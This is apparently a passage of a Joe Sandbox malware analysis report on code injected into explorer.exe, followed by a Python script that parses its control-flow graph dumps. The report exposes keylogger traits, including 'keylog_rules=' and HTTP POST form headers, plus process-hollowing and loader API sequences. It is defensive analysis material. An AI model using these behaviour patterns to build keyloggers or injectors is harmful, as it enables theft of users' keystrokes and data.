                                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 02EF2139
                                                                                                                                        • wsprintfW.USER32 ref: 02EF2272
                                                                                                                                        • wsprintfW.USER32 ref: 02EF22DD
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02EF23A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                                                        • Opcode ID: a919847c549348b771cde4b0d21261d9e4d17e763332320aaea1864a166da73c
                                                                                                                                        • Instruction ID: e0bf68cc20a5bd853adda30c4381d14c29a194dbb089b95145628aeb7a2ecfe6
                                                                                                                                        • Opcode Fuzzy Hash: a919847c549348b771cde4b0d21261d9e4d17e763332320aaea1864a166da73c
                                                                                                                                        • Instruction Fuzzy Hash: A3A18B71688341AFD3909F69D884A2BBBE9EFC8744F40992DFB85C7250DB70D944CB62

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02EF12D9,00000000,00000000,?,00000001), ref: 02EF29C7
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02EF12DC
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02EF138A
                                                                                                                                          • Part of subcall function 02EF2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02EF1119,00000001), ref: 02EF2850
                                                                                                                                          • Part of subcall function 02EF2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02EF1119,00000001), ref: 02EF2855
                                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02EF1316
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF1332
                                                                                                                                          • Part of subcall function 02EF2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02EF136E), ref: 02EF2591
                                                                                                                                          • Part of subcall function 02EF2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02EF259A
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF135F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2993730741-0
                                                                                                                                        • Opcode ID: 06288e7cbe7255666e51741d9afd979bbe4870a6fcdd3ea5855cc6e5dba542aa
                                                                                                                                        • Instruction ID: 6405d561c36b6bcc358b4d6c9e27ff9644af2aacf3b43949f3aaf73ddefc36a8
                                                                                                                                        • Opcode Fuzzy Hash: 06288e7cbe7255666e51741d9afd979bbe4870a6fcdd3ea5855cc6e5dba542aa
                                                                                                                                        • Instruction Fuzzy Hash: D721E170B85305DF8784EE29885497FB7DAABC4704B40A92EFF4AD7740DB34DC498A62

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02EF15A9
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02EF15C6
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 02EF15DC
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02EF1600
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02EF161C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1114890469-0
                                                                                                                                        • Opcode ID: dadb238a774472d20d66308882851d90a0cf8c09d25d8b532c82a66faa985ece
                                                                                                                                        • Instruction ID: a02c81cb65ad271d85b162e5b5a58d20b0fd72d5329440ecd65bbf280ac29334
                                                                                                                                        • Opcode Fuzzy Hash: dadb238a774472d20d66308882851d90a0cf8c09d25d8b532c82a66faa985ece
                                                                                                                                        • Instruction Fuzzy Hash: 1C016B32FC0149DB86E4667A6C586BE33AE9FD521C709E466FB0F9B100DF248C024650

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02EF1BF4
                                                                                                                                        • LoadLibraryA.KERNEL32(?,02EF5848,00000000,00000000,74DF2EE0,00000000,02EF19B6,?,?,?,00000001,?,00000000), ref: 02EF1C1C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02EF1C49
                                                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02EF1C9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3827878703-0
                                                                                                                                        • Opcode ID: 3305970d97e2c2bb9bea84910436b001c16efbd7e1ef3be9dda7bb8ee207255a
                                                                                                                                        • Instruction ID: e1ca1a5a69cd8dce046f8c095054a70f008ee8fb6077334a9c9a3cf498608ac0
                                                                                                                                        • Opcode Fuzzy Hash: 3305970d97e2c2bb9bea84910436b001c16efbd7e1ef3be9dda7bb8ee207255a
                                                                                                                                        • Instruction Fuzzy Hash: 7E318071780619EBCB9CCF29C884BA6B7A8BF0531CF14956DE94ECB600D731E855DBA0
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02EF582C), ref: 02EF1839
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF1845
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02EF582C), ref: 02EF18A9
                                                                                                                                        • Sleep.KERNEL32(00007530), ref: 02EF18B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2134730579-0
                                                                                                                                        • Opcode ID: ec5022b730ae7f51243f1977cf300f8f5b00094e624f1f704fd910ca950d3bbc
                                                                                                                                        • Instruction ID: d35de0c5aea73aeac976c73c19284bc053ff3f4779a4172fa442178bad418c17
                                                                                                                                        • Opcode Fuzzy Hash: ec5022b730ae7f51243f1977cf300f8f5b00094e624f1f704fd910ca950d3bbc
                                                                                                                                        • Instruction Fuzzy Hash: 3401A230DD0640EBD7D4A7A6ED2892E3AAAEBC17007909429FB058B240DB308951DFB2
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02EF11DD), ref: 02EF26DB
                                                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 02EF26ED
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 02EF2700
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2716
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 331459951-0
                                                                                                                                        • Opcode ID: 2ce7bae0c469c4db1a9138d0d900d86984f6daeaeb5f53eefb55f00a981dba0a
                                                                                                                                        • Instruction ID: 6b589f9d88cd65ce2e096f085071eb028b884a42aa7abd3b85b2763f077f41ee
                                                                                                                                        • Opcode Fuzzy Hash: 2ce7bae0c469c4db1a9138d0d900d86984f6daeaeb5f53eefb55f00a981dba0a
                                                                                                                                        • Instruction Fuzzy Hash: F3F09071CC2218FF9B50CFA19D488EEB7BCEF05259B5042AAEB0093180D7304E40E6A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 02EF17F3
                                                                                                                                        • wsprintfW.USER32 ref: 02EF181D
                                                                                                                                        Strings
                                                                                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02EF1817
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                        • API String ID: 377395780-613334611
                                                                                                                                        • Opcode ID: 7d48d51ccf8f1bf4655d7c0a9fc9ac4e46b63ae2bb8acbaa396395a1b7a1f79c
                                                                                                                                        • Instruction ID: bf752e84ed2c775600226390122fa2d863a5ee4572dc1ed6b40e0313928e9533
                                                                                                                                        • Opcode Fuzzy Hash: 7d48d51ccf8f1bf4655d7c0a9fc9ac4e46b63ae2bb8acbaa396395a1b7a1f79c
                                                                                                                                        • Instruction Fuzzy Hash: B2F03062D40128BA9B54ABDA9C058FFB3FCEB0CB02B40058AFB41E1180E67859A0D3B5

                                                                                                                                        Callgraph


                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 004D378C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 498011366-0
                                                                                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                        • Instruction ID: 82c65fae17e1e5de2419f14fb46055c329890a1d401718eba02ff3fbd049f8fb
                                                                                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                        • Instruction Fuzzy Hash: B6119374601D094BEB58FBB998AD27633E1E714316F54816FA815C73A2DE3D8A818705

                                                                                                                                        Control-flow Graph

control_flow_graph (blocks: id: start-end [call target | API [* call sites]]; edges: from -> to)
Blocks
• 0: 4db4a8-4db4ab
• 1: 4db4b5-4db4b9
• 2: 4db4bb-4db4c3
• 3: 4db4c5
• 4: 4db4ad-4db4b3
• 5: 4db4c7
• 6: 4db4ca-4db4d1
• 8: 4db4dd
• 9: 4db4d3-4db4db
• 10: 4db4df-4db4e2
• 11: 4db4e4-4db4f2
• 12: 4db4f7-4db504
• 13: 4db52e-4db549
• 14: 4db4f4-4db4f5
• 15: 4db57a-4db57d
• 17: 4db57f-4db580
• 18: 4db582-4db589
• 20: 4db561-4db565
• 21: 4db58f-4db593
• 22: 4db51e-4db52c, call 4db46a
• 23: 4db506-4db508
• 24: 4db54b-4db54e
• 25: 4db567-4db56a
• 26: 4db595-4db5ae, LoadLibraryA
• 27: 4db5f0-4db5f9
• 28: 4db5af-4db5b6
• 29: 4db550
• 30: 4db50b-4db512
• 31: 4db56c-4db570
• 32: 4db5fc-4db605
• 35: 4db5b8
• 36: 4db551-4db555
• 37: 4db572-4db579
• 38: 4db62a-4db67a, VirtualProtect * 2
• 39: 4db607-4db609
• 40: 4db5ba-4db5c2
• 41: 4db5c4-4db5cc
• 42: 4db557-4db559
• 44: 4db61c-4db628
• 45: 4db60b-4db61a
• 46: 4db67e-4db683
• 47: 4db685-4db694
• 48: 4db5ce-4db5da
• 49: 4db55b-4db55f
• 50: 4db51c
• 51: 4db514-4db51a
• 54: 4db5dc-4db5e3
• 55: 4db5e5-4db5ef
Edges
• 0 -> 1
• 1 -> 2, 3
• 2 -> 3
• 3 -> 4, 5
• 4 -> 1
• 5 -> 6
• 6 -> 8, 9
• 8 -> 6, 10
• 9 -> 8
• 10 -> 11, 12
• 11 -> 13, 14
• 12 -> 22, 23
• 13 -> 15
• 14 -> 12
• 15 -> 17, 18
• 17 -> 20
• 18 -> 21
• 20 -> 24, 25
• 21 -> 26, 27
• 22 -> 1
• 23 -> 30
• 24 -> 18, 29
• 25 -> 18, 31
• 26 -> 28
• 27 -> 32
• 28 -> 21, 35
• 29 -> 36
• 30 -> 50, 51
• 31 -> 36, 37
• 32 -> 38, 39
• 35 -> 40, 41
• 36 -> 20, 42
• 37 -> 15
• 38 -> 46
• 39 -> 44, 45
• 40 -> 48
• 41 -> 48
• 42 -> 20, 49
• 44 -> 45
• 45 -> 32
• 46 -> 46, 47
• 48 -> 54, 55
• 49 -> 20, 25
• 50 -> 22, 30
• 51 -> 50
• 54 -> 28
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 004DB5A7
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 004DB651
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 004DB66F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004DA000.00000040.80000000.00040000.00000000.sdmp, Offset: 004DA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4da000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 895956442-0
                                                                                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                        • Instruction ID: 6b80e6b9117ae0590efc540d252bf551b375ef9b78dc10799397c1d28dfcdd95
                                                                                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                        • Instruction Fuzzy Hash: BC518B3175491D9BCB24AA38ACF42F5B3C1F759329B59062BC48AC3385D75CC84683CA

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004D1BF8: OpenFileMappingA.KERNEL32 ref: 004D1C0F
                                                                                                                                          • Part of subcall function 004D1BF8: MapViewOfFile.KERNELBASE ref: 004D1C2E
                                                                                                                                        • SysFreeMap.PGOCR ref: 004D36F7
                                                                                                                                        • SleepEx.KERNELBASE ref: 004D3701
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4205437007-0
                                                                                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                        • Instruction ID: 67ded6d96049de90f6bd53c231d07bb9e1c6fccd3ceb4b1aebfdcf845d3e7427
                                                                                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                        • Instruction Fuzzy Hash: 22519430218A085FDB19FF29D8A96AA7391EB94315F44461FE447C73A1DF3CDA058786

                                                                                                                                        Control-flow Graph

control_flow_graph (blocks: id: start-end [API]; edges: from -> to)
Blocks
• 113: 4d1bf8-4d1c18, OpenFileMappingA
• 114: 4d1c3b-4d1c48
• 115: 4d1c1a-4d1c38, MapViewOfFile
Edges
• 113 -> 114, 115
• 115 -> 114
APIs
• OpenFileMappingA.KERNEL32 ref: 004D1C0F
• MapViewOfFile.KERNELBASE ref: 004D1C2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$MappingOpenView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3439327939-0
                                                                                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                        • Instruction ID: 6c7a65d5fc388cc0b49a965f6208c27d4291a2d5e978670403597d7e701fb9f5
                                                                                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                        • Instruction Fuzzy Hash: 2CF08234318F0D4FAB44EF7C9C9C136B7E0EBA8202700857A984AC6264EF34C8408701
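The control_flow_graph lines above (for 004D370C, 004DB4A8 and 004D1BF8) are the report's raw block/edge dumps. The parser below is an added example, not Joe Sandbox code: it splits such a line into basic blocks and edges, lists the API call sites with their addresses and per-block call counts (the "VirtualProtect * 2" form), flags blocks that call the function's own entry address (block 136 of 004D370C calls 4d370c, the function's first block), and finds the edges that close loops. The token grammar is inferred from the dumps on this page rather than from a published specification, and the function and type names (parse_cfg, Block, api_call_sites, recursive_blocks, walk) are my own. The two embedded dump strings are copied from this report.

```python
"""Parse Joe Sandbox 'control_flow_graph' dump lines (added example, not Joe Sandbox code).
Grammar inferred from this report's dump lines, not from a published specification:
    block := <id> <start>[-<end>] [ call <addr> | <ApiName> [ * <count> ] ]
    edge  := <id>-><id>
Blocks keep dump order, so the first key of the returned dict is the entry block."""
from __future__ import annotations
import re
from dataclasses import dataclass

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


@dataclass
class Block:
    nid: int
    start: int
    end: int
    call: int | None = None  # internal call target from a 'call <addr>' suffix
    api: str | None = None   # imported API invoked in this block
    api_count: int = 1       # '<ApiName> * n' marks n call sites in one block


def parse_cfg(text: str) -> tuple[dict[int, Block], list[tuple[int, int]]]:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    i = 0
    while i < len(toks):
        m = EDGE_RE.match(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A block is a decimal id followed by a hex address or range (a range with no
        # hex letters and no dash would be ambiguous; none occur in this report).
        am = ADDR_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
        if not toks[i].isdigit() or am is None:
            raise ValueError(f"unexpected token {toks[i]!r} at position {i}")
        start = int(am.group(1), 16)
        blk = Block(int(toks[i]), start, int(am.group(2), 16) if am.group(2) else start)
        i += 2
        if i < len(toks) and toks[i] == "call":
            blk.call, i = int(toks[i + 1], 16), i + 2
        elif i < len(toks) and not toks[i].isdigit() and not EDGE_RE.match(toks[i]):
            blk.api, i = toks[i], i + 1
            if i + 1 < len(toks) and toks[i] == "*":
                blk.api_count, i = int(toks[i + 1]), i + 2
        blocks[blk.nid] = blk
    return blocks, edges


def api_call_sites(blocks: dict[int, Block]) -> list[tuple[str, int, int]]:
    """(API name, block start address, call sites in that block), sorted."""
    return sorted((b.api, b.start, b.api_count) for b in blocks.values() if b.api)


def recursive_blocks(blocks: dict[int, Block]) -> list[int]:
    """Blocks whose internal call target is this function's own entry address."""
    entry_addr = next(iter(blocks.values())).start
    return sorted(b.nid for b in blocks.values() if b.call == entry_addr)


def walk(blocks: dict[int, Block], edges: list[tuple[int, int]]) -> tuple[set[int], set[tuple[int, int]]]:
    """DFS from the entry block: (reachable block ids, back edges). A back edge targets a
    block still on the DFS stack, so each one closes a loop (a self-loop counts too)."""
    succ: dict[int, list[int]] = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    on_stack, seen, back = set(), set(), set()

    def visit(u: int) -> None:
        on_stack.add(u)
        seen.add(u)
        for v in succ.get(u, []):
            if v in on_stack:
                back.add((u, v))
            elif v not in seen:
                visit(v)
        on_stack.discard(u)

    visit(next(iter(blocks)))
    return seen, back


# Dump lines copied verbatim from this report (functions 004D370C and 004DB4A8 in the
# explorer.exe memory dump); whitespace between string pieces is just Python line wrapping.
UNMAP_CFG = (
    "control_flow_graph 116 4d370c-4d371c call 4d1c6c 119 4d37b0-4d37b5 116->119 "
    "120 4d3722-4d3754 call 4d1838 116->120 124 4d3785-4d37aa NtUnmapViewOfSection "
    "120->124 125 4d3756-4d375b call 4d1838 120->125 129 4d37bc-4d37cb call 4d34c4 "
    "124->129 130 4d37ac-4d37ae 124->130 127 4d3760-4d3779 125->127 127->124 "
    "136 4d37cd-4d37d0 call 4d370c 129->136 137 4d37d5-4d37de 129->137 130->119 "
    "132 4d37b6-4d37bb call 4d31ac 130->132 132->129 136->137")
LOADER_CFG = (
    "control_flow_graph 0 4db4a8-4db4ab 1 4db4b5-4db4b9 0->1 2 4db4bb-4db4c3 1->2 3 4db4c5 1->3 2->3 "
    "4 4db4ad-4db4b3 3->4 5 4db4c7 3->5 4->1 6 4db4ca-4db4d1 5->6 8 4db4dd 6->8 9 4db4d3-4db4db 6->9 8->6 "
    "10 4db4df-4db4e2 8->10 9->8 11 4db4e4-4db4f2 10->11 12 4db4f7-4db504 10->12 13 4db52e-4db549 11->13 "
    "14 4db4f4-4db4f5 11->14 22 4db51e-4db52c call 4db46a 12->22 23 4db506-4db508 12->23 15 4db57a-4db57d "
    "13->15 14->12 17 4db57f-4db580 15->17 18 4db582-4db589 15->18 20 4db561-4db565 17->20 21 4db58f-4db593 "
    "18->21 24 4db54b-4db54e 20->24 25 4db567-4db56a 20->25 26 4db595-4db5ae LoadLibraryA 21->26 "
    "27 4db5f0-4db5f9 21->27 22->1 30 4db50b-4db512 23->30 24->18 29 4db550 24->29 25->18 31 4db56c-4db570 "
    "25->31 28 4db5af-4db5b6 26->28 32 4db5fc-4db605 27->32 28->21 35 4db5b8 28->35 36 4db551-4db555 29->36 "
    "50 4db51c 30->50 51 4db514-4db51a 30->51 31->36 37 4db572-4db579 31->37 38 4db62a-4db67a VirtualProtect * 2 "
    "32->38 39 4db607-4db609 32->39 40 4db5ba-4db5c2 35->40 41 4db5c4-4db5cc 35->41 36->20 42 4db557-4db559 "
    "36->42 37->15 46 4db67e-4db683 38->46 44 4db61c-4db628 39->44 45 4db60b-4db61a 39->45 48 4db5ce-4db5da "
    "40->48 41->48 42->20 49 4db55b-4db55f 42->49 44->45 45->32 46->46 47 4db685-4db694 46->47 "
    "54 4db5dc-4db5e3 48->54 55 4db5e5-4db5ef 48->55 49->20 49->25 50->22 50->30 51->50 54->28")
```

Call parse_cfg() on a dump line and pass the result to api_call_sites(), recursive_blocks() and walk(). For 004D370C this yields 11 blocks, 14 edges, one API site (NtUnmapViewOfSection in the block at 4d3785), block 136 as a call back to the entry address and no loop-closing edges; for 004DB4A8 it yields 48 blocks, 70 edges, LoadLibraryA at 4db595 plus two VirtualProtect calls in the block at 4db62a, and loop-closing edges that include 4->1, 8->6 and the self-loop 46->46.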